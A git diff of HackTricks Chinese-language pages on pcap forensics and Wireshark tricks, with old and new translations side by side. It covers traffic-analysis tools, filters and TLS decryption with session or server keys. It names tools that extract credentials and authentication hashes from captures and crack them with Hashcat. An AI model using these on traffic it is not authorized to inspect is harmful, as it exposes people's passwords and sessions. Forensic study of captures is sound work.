* **加入**[**💬**](https://emojipedia.org/speech-balloon/) [**Discord群组**](https://discord.gg/hRep4RUj7f)或[**电报群组**](https://t.me/peass)或**关注**我在**Twitter**上的[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* **通过向**[**hacktricks repo**](https://github.com/carlospolop/hacktricks) **和**[**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **提交PR来分享你的黑客技巧。**
支持 HackTricks 的其他方式:
* 如果您想在 **HackTricks 中看到您的公司广告****下载 HackTricks 的 PDF**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)
* 获取 [**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
* 发现 [**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们独家的 [**NFTs 集合**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或在 **Twitter** 🐦 上**关注**我 [**@carlospolopm**](https://twitter.com/carlospolopm)**。**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享您的黑客技巧。
</details>
<figure><img src="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FelPCTwoecVdnsfjxCZtN%2Fimage.png?alt=media&#x26;token=9ee4ff3e-92dc-471c-abfe-1c25e446a6ed" alt=""><figcaption></figcaption></figure>
[**RootedCON**](https://www.rootedcon.com/) 是西班牙最重要的网络安全活动之一,也是欧洲最重要的网络安全活动之一。作为促进技术知识的使命,这个大会是技术和网络安全专业人士在各个领域的热点交流
[**RootedCON**](https://www.rootedcon.com/) 是 **西班牙** 最重要的网络安全活动,也是 **欧洲** 最重要的活动之一。以 **推广技术知识** 为使命,这个大会是技术和网络安全专业人士的热点聚集地
{% embed url="https://www.rootedcon.com/" %}
{% hint style="info" %}
关于**PCAP**与**PCAPNG**的说明PCAP文件格式有两个版本**PCAPNG是较新的版本不被所有工具支持**。您可能需要使用Wireshark或其他兼容工具将文件从PCAPNG转换为PCAP以便在其他工具中使用它
关于 **PCAP****PCAPNG** 的说明PCAP 文件格式有两个版本;**PCAPNG 是更新的版本,不是所有工具都支持**。您可能需要使用 Wireshark 或其他兼容工具将 PCAPNG 文件转换为 PCAP以便在某些其他工具中使用
{% endhint %}
## 在线工具用于pcap
## 在线工具用于 pcaps
* 如果您的pcap文件头部**损坏**,您可以尝试使用[http://f00l.de/hacking/**pcapfix.php**](http://f00l.de/hacking/pcapfix.php)
* 在[**PacketTotal**](https://packettotal.com)中提取**信息**并搜索pcap中的**恶意软件**
* 使用[**www.virustotal.com**](https://www.virustotal.com)和[**www.hybrid-analysis.com**](https://www.hybrid-analysis.com)搜索**恶意活动**
* 如果您的 pcap 头部**损坏**,您应该尝试使用以下工具进行**修复**[http://f00l.de/hacking/**pcapfix.php**](http://f00l.de/hacking/pcapfix.php)
* 在 [**PacketTotal**](https://packettotal.com) 中提取**信息**并搜索 pcap 中的**恶意软件**
* 使用 [**www.virustotal.com**](https://www.virustotal.com) [**www.hybrid-analysis.com**](https://www.hybrid-analysis.com) 搜索**恶意活动**
## 提取信息
以下工具对于提取统计信息、文件等非常有用。
以下工具对于提取统计数据、文件等很有用。
### Wireshark
{% hint style="info" %}
**如果您要分析PCAP基本上必须知道如何使用Wireshark**
**如果您要分析 PCAP基本上必须知道如何使用 Wireshark**
{% endhint %}
您可以在以下位置找到一些Wireshark技巧
您可以在以下位置找到一些 Wireshark 技巧:
{% content-ref url="wireshark-tricks.md" %}
[wireshark-tricks.md](wireshark-tricks.md)
{% endcontent-ref %}
### Xplico Framework
### Xplico 框架
[**Xplico** ](https://github.com/xplico/xplico)_(仅适用于Linux)_可以**分析**pcap并从中提取信息。例如从pcap文件中Xplico可以提取每个电子邮件POP、IMAP和SMTP协议所有HTTP内容每个VoIP呼叫SIPFTPTFTP等等。
[**Xplico**](https://github.com/xplico/xplico) _(仅限 linux)_ 可以**分析** **pcap** 并从中提取信息。例如Xplico 可以从 pcap 文件中提取每封电子邮件POP、IMAP 和 SMTP 协议)、所有 HTTP 内容、每个 VoIP 呼叫SIP、FTP、TFTP 等。
**安装**
```bash
@ -60,30 +62,30 @@ sudo apt-get install xplico
/etc/init.d/apache2 restart
/etc/init.d/xplico start
```
访问使用凭据 _**xplico:xplico**__**127.0.0.1:9876**_
访问 _**127.0.0.1:9876**_,使用凭证 _**xplico:xplico**_
然后创建一个**新案例**,在案例中创建一个**新会话**并**上传pcap文件**。
然后创建一个**新案例**,在案例中创建一个**新会话**并**上传 pcap 文件**。
### NetworkMiner
与Xplico一样这是一个用于**分析和提取pcap文件中的对象**的工具。你可以在[**这里**](https://www.netresec.com/?page=NetworkMiner)下载它的免费版本。它适用于**Windows**操作系统。\
这个工具还可以用来从数据包中获取**其他分析信息**,以便更快地了解发生了什么
像 Xplico 一样,它是一个**分析和从 pcaps 提取对象的工具**。它有一个免费版本,你可以在[**这里**](https://www.netresec.com/?page=NetworkMiner) **下载**。它适用于**Windows**。\
这个工具也有助于从数据包中获取**其他分析信息**,以便能够以更**快速**的方式了解正在发生的事情
### NetWitness Investigator
你可以从[**这里**](https://www.rsa.com/en-us/contact-us/netwitness-investigator-freeware)下载NetWitness Investigator它适用于Windows操作系统。\
这是另一个有用的工具,它可以**分析数据包**并以有用的方式对信息进行排序,以便**了解内部发生的情况**。
你可以在[**这里下载 NetWitness Investigator**](https://www.rsa.com/en-us/contact-us/netwitness-investigator-freeware) **(它适用于 Windows**。\
这是另一个有用的工具,它**分析数据包**并以有用的方式排序信息,以便**了解内部发生的事情**。
![](<../../../.gitbook/assets/image (567) (1).png>)
### [BruteShark](https://github.com/odedshimon/BruteShark)
* 提取和编码用户名和密码HTTP、FTP、Telnet、IMAP、SMTP...
* 提取认证哈希并使用Hashcat破解Kerberos、NTLM、CRAM-MD5、HTTP-Digest...
* 构建可视化网络图(网络节点和用户)
* 提取DNS查询
* 重构所有TCP和UDP会话
* 文件切割
* 提取认证哈希并使用 Hashcat 破解Kerberos、NTLM、CRAM-MD5、HTTP-Digest...
* 构建视觉网络图(网络节点和用户)
* 提取 DNS 查询
* 重建所有 TCP 和 UDP 会话
* 文件雕刻
### Capinfos
```
@ -91,13 +93,13 @@ capinfos capture.pcap
```
### Ngrep
如果你想在pcap文件中查找某些内容可以使用ngrep。以下是使用主要过滤器的示例:
如果您在 pcap 中**寻找**某**些东西**,您可以使用 **ngrep**。以下是使用主要过滤器的示例:
```bash
ngrep -I packets.pcap "^GET" "port 80 and tcp and host 192.168 and dst host 192.168 and src host 192.168"
```
### 数据恢复
### 文件提取
使用常见的数据恢复技术可以从pcap中提取文件和信息
使用常见的文件提取技术可以从pcap中提取文件和信息
{% content-ref url="../partitions-file-systems-carving/file-data-carving-recovery-tools.md" %}
[file-data-carving-recovery-tools.md](../partitions-file-systems-carving/file-data-carving-recovery-tools.md)
@ -105,11 +107,11 @@ ngrep -I packets.pcap "^GET" "port 80 and tcp and host 192.168 and dst host 192.
### 捕获凭证
您可以使用工具如[https://github.com/lgandx/PCredz](https://github.com/lgandx/PCredz)从pcap或实时接口中解析凭证。
您可以使用像 [https://github.com/lgandx/PCredz](https://github.com/lgandx/PCredz) 这样的工具从pcap或实时接口解析凭证。
<figure><img src="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FelPCTwoecVdnsfjxCZtN%2Fimage.png?alt=media&#x26;token=9ee4ff3e-92dc-471c-abfe-1c25e446a6ed" alt=""><figcaption></figcaption></figure>
[**RootedCON**](https://www.rootedcon.com/) 是西班牙最重要的网络安全活动之一,也是欧洲最重要的网络安全活动之一。作为促进技术知识的使命,这个大会是技术和网络安全专业人士在各个领域的热点交流平台
[**RootedCON**](https://www.rootedcon.com/) 是**西班牙**最重要的网络安全活动,也是**欧洲**最重要的活动之一。以**推广技术知识为使命**,这个大会是技术和网络安全专业人士在各个学科的沸腾交汇点
{% embed url="https://www.rootedcon.com/" %}
@ -124,75 +126,7 @@ apt-get install oinkmaster
echo "url = http://rules.emergingthreats.net/open/suricata/emerging.rules.tar.gz" >> /etc/oinkmaster.conf
oinkmaster -C /etc/oinkmaster.conf -o /etc/suricata/rules
```
**检查 pcap 文件**
To analyze a pcap file, you can use tools like Wireshark or tcpdump. These tools allow you to inspect the network traffic captured in the pcap file.
要分析 pcap 文件,可以使用 Wireshark 或 tcpdump 等工具。这些工具允许您检查在 pcap 文件中捕获的网络流量。
**Inspect packets**
**检查数据包**
Once you have opened the pcap file in a packet analysis tool, you can start inspecting the individual packets. Look for any suspicious or abnormal behavior in the network traffic.
在数据包分析工具中打开 pcap 文件后,您可以开始检查各个数据包。查找网络流量中的任何可疑或异常行为。
**Filter packets**
**过滤数据包**
To focus on specific packets of interest, you can apply filters to the pcap file. Filters allow you to narrow down the packets based on specific criteria such as source or destination IP address, port number, protocol, or packet content.
为了关注感兴趣的特定数据包,可以对 pcap 文件应用过滤器。过滤器允许您根据特定的条件(如源或目标 IP 地址、端口号、协议或数据包内容)缩小数据包范围。
**Reconstruct sessions**
**重建会话**
In some cases, it may be necessary to reconstruct the sessions from the captured packets. This can be done by analyzing the packet headers and payload to identify the start and end of each session.
在某些情况下,可能需要从捕获的数据包中重建会话。这可以通过分析数据包头部和有效载荷来识别每个会话的开始和结束来完成。
**Extract files**
**提取文件**
If the pcap file contains file transfers or downloads, you can extract those files for further analysis. Look for packets with file attachments or HTTP requests/responses that include file content.
如果 pcap 文件包含文件传输或下载,可以提取这些文件进行进一步分析。查找带有文件附件或包含文件内容的 HTTP 请求/响应的数据包。
**Analyze timestamps**
**分析时间戳**
Timestamps in the pcap file can provide valuable information about the timing and sequence of network events. Analyzing the timestamps can help in understanding the order of network activities and identifying any time gaps or delays.
pcap 文件中的时间戳可以提供有关网络事件的时间和顺序的有价值的信息。分析时间戳可以帮助理解网络活动的顺序,并识别任何时间间隔或延迟。
**Follow TCP streams**
**跟踪 TCP 流**
To get a complete view of a TCP session, you can follow the TCP streams in the pcap file. This allows you to see the entire conversation between the client and server, including request and response payloads.
为了完整地查看 TCP 会话,可以在 pcap 文件中跟踪 TCP 流。这样可以看到客户端和服务器之间的完整对话,包括请求和响应的有效载荷。
**Identify anomalies**
**识别异常**
During the pcap inspection, keep an eye out for any anomalies or suspicious patterns in the network traffic. Look for unexpected protocols, unusual packet sizes, or any other indicators of potential security breaches.
在 pcap 检查过程中,注意网络流量中的任何异常或可疑模式。寻找意外的协议、异常的数据包大小或任何其他潜在安全漏洞的指示器。
**Document findings**
**记录发现**
As you analyze the pcap file, make sure to document your findings. Take notes on any interesting packets, suspicious activities, or potential security issues. This documentation will be useful for further investigation or reporting.
在分析 pcap 文件时,请确保记录您的发现。记录任何有趣的数据包、可疑活动或潜在的安全问题。这些记录将有助于进一步的调查或报告。
**检查 pcap**
```
suricata -r packets.pcap -c /etc/suricata/suricata.yaml -k none -v -l log
```
@ -200,11 +134,11 @@ suricata -r packets.pcap -c /etc/suricata/suricata.yaml -k none -v -l log
[**YaraPCAP**](https://github.com/kevthehermit/YaraPcap) 是一个工具,它可以:
* 读取 PCAP 文件并提取 HTTP 流。
* 对任何压缩流进行 gzip 解压
* 使用 Yara 扫描每个文件。
* 写 report.txt。
* 可选择将匹配的文件保存到一个目录
* 读取 PCAP 文件并提取 Http 流。
* 对任何压缩流进行 gzip 解压。
* 使用 yara 扫描每个文件。
* 写 report.txt 报告
* 可选地将匹配的文件保存到一个目录中
### 恶意软件分析
@ -216,9 +150,9 @@ suricata -r packets.pcap -c /etc/suricata/suricata.yaml -k none -v -l log
## Zeek
> Zeek 是一个被动的、开源的网络流量分析器。许多运营商使用 Zeek 作为网络安全监视器 (NSM) 来支持对可疑或恶意活动的调查。Zeek 还支持广泛流量分析任务,超出了安全领域,包括性能测量和故障排除。
> Zeek 是一个被动的、开源的网络流量分析器。许多操作员使用 Zeek 作为网络安全监控器NSM支持对可疑或恶意活动的调查。Zeek 还支持安全领域之外的广泛流量分析任务,包括性能测量和故障排除。
基本上,由 `zeek` 创建的日志不是 **pcaps**。因此,您需要使用**其他工具**来分析包含有关 pcaps 的**信息**的日志。
基本上,由 `zeek` 创建的日志不是 **pcaps**。因此,您需要使用**其他工具**来分析包含 pcaps 信息的日志。
### 连接信息
```bash
@ -271,34 +205,6 @@ Score,Source IP,Destination IP,Connections,Avg Bytes,Intvl Range,Size Range,Top
0.838,10.55.200.10,205.251.194.64,210,69,29398,4,300,70,109,205,0,0,0,0
```
### DNS 信息
DNS域名系统是一种用于将域名转换为 IP 地址的系统。在网络流量分析中,检查 DNS 信息可以提供有关通信的重要线索。以下是一些有用的 DNS 信息检查方法:
#### DNS 查询
通过检查 DNS 查询,可以了解主机正在尝试访问的域名。这可以帮助确定主机的意图和目标。
#### DNS 响应
检查 DNS 响应可以揭示主机是否成功解析了域名,并获取了相应的 IP 地址。这可以帮助确定主机是否与特定的服务器进行了通信。
#### DNS 转发
检查 DNS 转发可以显示主机是否将 DNS 查询发送到其他 DNS 服务器。这可以帮助确定主机是否使用了代理或中间人。
#### DNS 缓存
检查 DNS 缓存可以显示主机是否存储了先前的 DNS 查询结果。这可以帮助确定主机是否频繁访问相同的域名。
#### DNS 劫持
检查 DNS 劫持可以揭示主机是否受到了恶意攻击,其中攻击者篡改了 DNS 查询结果,将用户重定向到恶意网站。
#### DNS 异常
检查 DNS 异常可以显示主机是否存在异常的 DNS 查询或响应。这可以帮助确定主机是否受到了攻击或存在配置问题。
通过分析 DNS 信息,可以获得有关网络通信的重要线索,帮助进行取证分析和安全事件响应。
```bash
#Get info about each DNS request performed
cat dns.log | zeek-cut -c id.orig_h query qtype_name answers
@ -315,7 +221,7 @@ cat dns.log | zeek-cut qtype_name | sort | uniq -c | sort -nr
#See top DNS domain requested with rita
rita show-exploded-dns -H --limit 10 zeek_logs
```
## 其他pcap分析技巧
## 其他 pcap 分析技巧
{% content-ref url="dnscat-exfiltration.md" %}
[dnscat-exfiltration.md](dnscat-exfiltration.md)
@ -333,18 +239,20 @@ rita show-exploded-dns -H --limit 10 zeek_logs
<figure><img src="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FelPCTwoecVdnsfjxCZtN%2Fimage.png?alt=media&#x26;token=9ee4ff3e-92dc-471c-abfe-1c25e446a6ed" alt=""><figcaption></figcaption></figure>
[**RootedCON**](https://www.rootedcon.com/) 是西班牙最重要的网络安全活动之一,也是欧洲最重要的网络安全活动之一。作为促进技术知识的使命,这个大会是技术和网络安全专业人士的热点交流平台
[**RootedCON**](https://www.rootedcon.com/) 是**西班牙**最重要的网络安全活动,也是**欧洲**最重要的活动之一。以**推广技术知识**为使命,这个大会是技术和网络安全专业人士在各个学科的沸腾交汇点
{% embed url="https://www.rootedcon.com/" %}
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>从零开始学习 AWS 黑客技术,成为</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS 红队专家)</strong></a><strong></strong></summary>
* 你在一家网络安全公司工作吗你想在HackTricks中看到你的公司广告吗或者你想获得PEASS的最新版本或下载PDF版本的HackTricks吗请查看[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)
* 发现我们的独家[NFTs](https://opensea.io/collection/the-peass-family)收藏品[**The PEASS Family**](https://opensea.io/collection/the-peass-family)
* 获得[**官方PEASS和HackTricks周边产品**](https://peass.creator-spring.com)
* **加入**[**💬**](https://emojipedia.org/speech-balloon/) [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram群组**](https://t.me/peass) 或 **关注**我在**Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **通过向**[**hacktricks repo**](https://github.com/carlospolop/hacktricks) **和**[**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **提交PR来分享你的黑客技巧。**
支持 HackTricks 的其他方式:
* 如果您希望在 **HackTricks** 中看到您的**公司广告**或**下载 HackTricks 的 PDF** 版本,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)
* 获取 [**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
* 发现 [**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们独家的 [**NFTs**](https://opensea.io/collection/the-peass-family) 收藏
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或在 **Twitter** 🐦 上**关注**我 [**@carlospolopm**](https://twitter.com/carlospolopm)**。**
* **通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享您的黑客技巧。**
</details>

101
forensics/basic-forensic-methodology/pcap-inspection/wireshark-tricks.md
View file

@ -1,24 +1,26 @@
# Wireshark技巧
# Wireshark 技巧
## Wireshark技巧
## Wireshark 技巧
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks云 ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 推特 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 YouTube 🎥</strong></a></summary>
<summary><strong>从零开始学习 AWS 黑客技术,成为</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS 红队专家)</strong></a><strong></strong></summary>
* 你在一家**网络安全公司**工作吗你想在HackTricks中看到你的**公司广告**吗?或者你想获得**PEASS的最新版本或下载PDF格式的HackTricks**吗?请查看[**订阅计划**](https://github.com/sponsors/carlospolop)
* 发现我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品[**The PEASS Family**](https://opensea.io/collection/the-peass-family)
* 获取[**官方PEASS和HackTricks周边产品**](https://peass.creator-spring.com)
* **加入**[**💬**](https://emojipedia.org/speech-balloon/) [**Discord群组**](https://discord.gg/hRep4RUj7f)或[**电报群组**](https://t.me/peass)或**关注**我在**Twitter**上的[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* **通过向**[**hacktricks repo**](https://github.com/carlospolop/hacktricks) **和**[**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **提交PR来分享你的黑客技巧。**
支持 HackTricks 的其他方式:
* 如果您希望在 **HackTricks** 中看到您的**公司广告**或**下载 HackTricks 的 PDF**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)
* 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
* 发现[**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs 集合**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或在 **Twitter** 🐦 上**关注**我 [**@carlospolopm**](https://twitter.com/carlospolopm)**。**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来**分享您的黑客技巧**。
</details>
## 提升你的Wireshark技能
## 提升你的 Wireshark 技能
### 教程
以下教程非常适合学习一些酷炫的基本技巧:
以下教程非常适合学习一些基本的酷炫技巧:
* [https://unit42.paloaltonetworks.com/unit42-customizing-wireshark-changing-column-display/](https://unit42.paloaltonetworks.com/unit42-customizing-wireshark-changing-column-display/)
* [https://unit42.paloaltonetworks.com/using-wireshark-display-filter-expressions/](https://unit42.paloaltonetworks.com/using-wireshark-display-filter-expressions/)
@ -29,111 +31,112 @@
**专家信息**
点击 _**Analyze** --> **Expert Information**_你将获得对**分析的数据包**的**概述**
点击 _**分析** --> **专家信息**_您将获得对分析中的数据包发生情况的**概览**
![](<../../../.gitbook/assets/image (570).png>)
**解析地址**
**解析地址**
_**Statistics --> Resolved Addresses**_ 下你可以找到Wireshark解析的一些信息比如端口/传输协议到协议的映射MAC地址到制造商的映射等。了解通信中涉及的内容非常有趣
_**统计 --> 解析地址**_ 下,您可以找到 Wireshark 解析的各种**信息**,如端口/传输协议到协议MAC 到制造商等。了解哪些内容涉及通信是很有趣的
![](<../../../.gitbook/assets/image (571).png>)
**协议层次结构**
_**Statistics --> Protocol Hierarchy**_ 下,你可以找到通信中涉及的**协议**以及与它们相关的数据。
_**统计 --> 协议层次结构**_ 下,您可以找到通信中涉及的**协议**及其数据。
![](<../../../.gitbook/assets/image (572).png>)
**话**
**话**
_**Statistics --> Conversations**_ 下,你可以找到通信中的**会话摘要**以及与它们相关的数据。
_**统计 --> 对话**_ 下,您可以找到通信中**对话的摘要**及其数据。
![](<../../../.gitbook/assets/image (573).png>)
**端点**
_**Statistics --> Endpoints**_ 下,你可以找到通信中的**端点摘要**以及每个端点的数据。
_**统计 --> 端点**_ 下,您可以找到通信中**端点的摘要**及其每个端点的数据。
![](<../../../.gitbook/assets/image (575).png>)
**DNS信息**
**DNS 信息**
_**Statistics --> DNS**_ 下你可以找到关于捕获的DNS请求的统计信息。
_**统计 --> DNS**_ 下,您可以找到捕获的 DNS 请求的统计信息。
![](<../../../.gitbook/assets/image (577).png>)
**I/O图表**
**I/O 图表**
_**Statistics --> I/O Graph**_ 下,你可以找到通信的**图表**。
_**统计 --> I/O 图表**_ 下,您可以找到**通信图表**。
![](<../../../.gitbook/assets/image (574).png>)
### 过滤器
在这里,你可以找到根据协议进行的Wireshark过滤器:[https://www.wireshark.org/docs/dfref/](https://www.wireshark.org/docs/dfref/)\
在这里,您可以根据协议找到 Wireshark 过滤器:[https://www.wireshark.org/docs/dfref/](https://www.wireshark.org/docs/dfref/)\
其他有趣的过滤器:
* `(http.request or ssl.handshake.type == 1) and !(udp.port eq 1900)`
* HTTP和初始的HTTPS流量
* HTTP 和初始 HTTPS 流量
* `(http.request or ssl.handshake.type == 1 or tcp.flags eq 0x0002) and !(udp.port eq 1900)`
* HTTP和初始的HTTPS流量 + TCP SYN
* HTTP 和初始 HTTPS 流量 + TCP SYN
* `(http.request or ssl.handshake.type == 1 or tcp.flags eq 0x0002 or dns) and !(udp.port eq 1900)`
* HTTP和初始的HTTPS流量 + TCP SYN + DNS请求
* HTTP 和初始 HTTPS 流量 + TCP SYN + DNS 请求
### 搜索
如果你想在会话的数据包中**搜索**内容请按下CTRL+f。你可以通过按右键然后编辑列来向主要信息栏添加新的图层编号、时间、源等
如果您想要在会话的**数据包**中**搜索**内容,请按 _CTRL+f_。您可以通过右键单击然后编辑列,向主信息栏(编号、时间、来源等)添加新层
练习[https://www.malware-traffic-analysis.net/](https://www.malware-traffic-analysis.net)
实践[https://www.malware-traffic-analysis.net/](https://www.malware-traffic-analysis.net)
## 识别域名
你可以添加一个显示Host HTTP头的列:
您可以添加一个显示 HTTP Host 头的列:
![](<../../../.gitbook/assets/image (403).png>)
还可以添加一个从初始的HTTPS连接中添加服务器名称的列(**ssl.handshake.type == 1**
以及一个添加来自初始 HTTPS 连接的服务器名称的列(**ssl.handshake.type == 1**
![](<../../../.gitbook/assets/image (408) (1).png>)
## 识别本地主机名
### 通过DHCP
### 来自 DHCP
在当前的Wireshark中不再使用`bootp`,而是需要搜索`DHCP`
在当前的 Wireshark 中,您需要搜索 `DHCP` 而不是 `bootp`
![](<../../../.gitbook/assets/image (404).png>)
### 通过NBNS
### 来自 NBNS
![](<../../../.gitbook/assets/image (405).png>)
## 解密TLS
## 解密 TLS
### 使用服务器私钥解密https流量
### 使用服务器私钥解密 https 流量
_edit>preference>protocol>ssl>_
![](<../../../.gitbook/assets/image (98).png>)
点击_Edit_并添加服务器和私钥的所有数据_IP、端口、协议、密钥文件和密码_
_编辑_ 并添加服务器和私钥的所有数据_IP、端口、协议、密钥文件和密码_
### 使用对称会话密钥解密https流量
### 使用对称会话密钥解密 https 流量
事实证明,Firefox和Chrome都支持将用于加密TLS流量的对称会话密钥记录到文件中。然后您可以将Wireshark指向该文件即可解密TLS流量。更多信息请参见[https://redflagsecurity.net/2019/03/10/decrypting-tls-wireshark/](https://redflagsecurity.net/2019/03/10/decrypting-tls-wireshark/)\
要检测此项,请在环境中搜索变量`SSLKEYLOGFILE`
Firefox Chrome 都支持将用于加密 TLS 流量的对称会话密钥记录到文件中。然后,您可以指向 Wireshark 该文件,即可!解密的 TLS 流量。更多信息[https://redflagsecurity.net/2019/03/10/decrypting-tls-wireshark/](https://redflagsecurity.net/2019/03/10/decrypting-tls-wireshark/)\
要检测这一点,请在环境内搜索变量 `SSLKEYLOGFILE`
共享密钥文件的格式如下
共享密钥的文件看起来像这样
![](<../../../.gitbook/assets/image (99).png>)
要在Wireshark中导入此文件请转到\_edit > preference > protocol > ssl > 并将其导入到(Pre)-Master-Secret log filename:
要在 wireshark 中导入此文件,请转到 _edit > preference > protocol > ssl > 并将其导入 (Pre)-Master-Secret log filename
![](<../../../.gitbook/assets/image (100).png>)
## ADB通信
## ADB 通信
ADB通信中提取发送的APK文件
ADB 通信中提取 APK其中 APK 被发送
```python
from scapy.all import *
@ -162,12 +165,14 @@ f.close()
```
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks 云 ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 推特 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>从零到英雄学习AWS黑客技术参加</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong></strong></summary>
* 你在一个 **网络安全公司** 工作吗?你想在 HackTricks 中看到你的 **公司广告**吗?或者你想获得 **PEASS 的最新版本或下载 HackTricks 的 PDF** 吗?请查看 [**订阅计划**](https://github.com/sponsors/carlospolop)
* 发现我们的独家 [**NFTs**](https://opensea.io/collection/the-peass-family) 集合 [**The PEASS Family**](https://opensea.io/collection/the-peass-family)
* 获得 [**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
* **加入** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注** 我的 **推特** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**hacktricks 仓库**](https://github.com/carlospolop/hacktricks) **和** [**hacktricks-cloud 仓库**](https://github.com/carlospolop/hacktricks-cloud) **提交 PR 来分享你的黑客技巧。**
支持HackTricks的其他方式
* 如果您想在**HackTricks中看到您的公司广告**或**下载HackTricks的PDF**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)
* 获取[**官方PEASS & HackTricks商品**](https://peass.creator-spring.com)
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs系列**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f)或[**telegram群组**](https://t.me/peass)或在**Twitter** 🐦 上**关注**我 [**@carlospolopm**](https://twitter.com/carlospolopm)**。**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
</details>

48
forensics/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md
View file

@ -2,17 +2,19 @@
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>从零到英雄学习AWS黑客技术通过</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS红队专家)</strong></a><strong></strong></summary>
* 如果你在一家**网络安全公司**工作,想在**HackTricks**上看到你的**公司广告**,或者想要获取**PEASS的最新版本或下载HackTricks的PDF**?请查看[**订阅计划**](https://github.com/sponsors/carlospolop)
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs**](https://opensea.io/collection/the-peass-family)系列。
